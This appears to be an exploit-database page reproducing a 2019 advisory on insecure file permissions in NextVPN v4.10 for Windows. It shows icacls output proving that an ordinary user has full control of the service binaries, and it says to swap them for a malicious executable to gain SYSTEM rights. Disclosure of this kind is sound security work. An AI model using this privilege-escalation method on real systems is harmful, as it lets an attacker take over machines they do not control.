Nextvpn v4.10 insecure file permissions Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-12-31 | Type : local | Platform : windows
This exploit / vulnerability Nextvpn v4.10 insecure file permissions is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: NextVPN v4.10 - Insecure File Permissions
# Date: 2019-12-23
# Exploit Author: SajjadBnd
# Contact: blackwolf@post.com
# Vendor Homepage: https://vm3max.site
# Software Link:http://dl.spacevm.com/NextVPNSetup-v4.10.exe
# Version: 4.10
# Tested on: Win10 Professional x64

[ Description ]

The NextVPN Application was installed with insecure file permissions. It was found that all folder and file permissions were incorrectly configured during installation. It was possible to replace the service binary.

[ PoC ]

C:\Users\user\AppData\Local\NextVPN>icacls *.exe

Helper64.exe NT AUTHORITY\SYSTEM:(F)
             BUILTIN\Administrators:(F)
             DESKTOP-5V14SL6\user:(F)
 
NextVPN.exe NT AUTHORITY\SYSTEM:(F)
            BUILTIN\Administrators:(F)
            DESKTOP-5V14SL6\user:(F)
 
Proxifier.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\user:(F)
 
ProxyChecker.exe NT AUTHORITY\SYSTEM:(F)
                 BUILTIN\Administrators:(F)
                 DESKTOP-5V14SL6\user:(F)
 
Uninstall.exe NT AUTHORITY\SYSTEM:(F)
              BUILTIN\Administrators:(F)
              DESKTOP-5V14SL6\user:(F)
 
Successfully processed 5 files; Failed processing 0 files
and other Directories :

>cd openconnect
openconnect.exe NT AUTHORITY\SYSTEM:(F)
                BUILTIN\Administrators:(F)
                DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
 
 
>cd st
 
st.exe NT AUTHORITY\SYSTEM:(F)
       BUILTIN\Administrators:(F)
       DESKTOP-5V14SL6\user:(F)
Successfully processed 1 files; Failed processing 0 files
 
>cd update

update.exe NT AUTHORITY\SYSTEM:(F)
           BUILTIN\Administrators:(F)
           DESKTOP-5V14SL6\user:(F)

Successfully processed 1 files; Failed processing 0 files

[ Exploit -Privilege Escalation ]

ReplaceNextVPN.exe,update.exe,st.exe,openconnect.exe,Helper64.exe and other ... with any executable
malicious file you want then wait and get SYSTEM or Administrator rights (Privilege Escalation)

 

Nextvpn v4.10 insecure file permissions


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Nextvpn v4.10 insecure file permissions Vulnerability / Exploit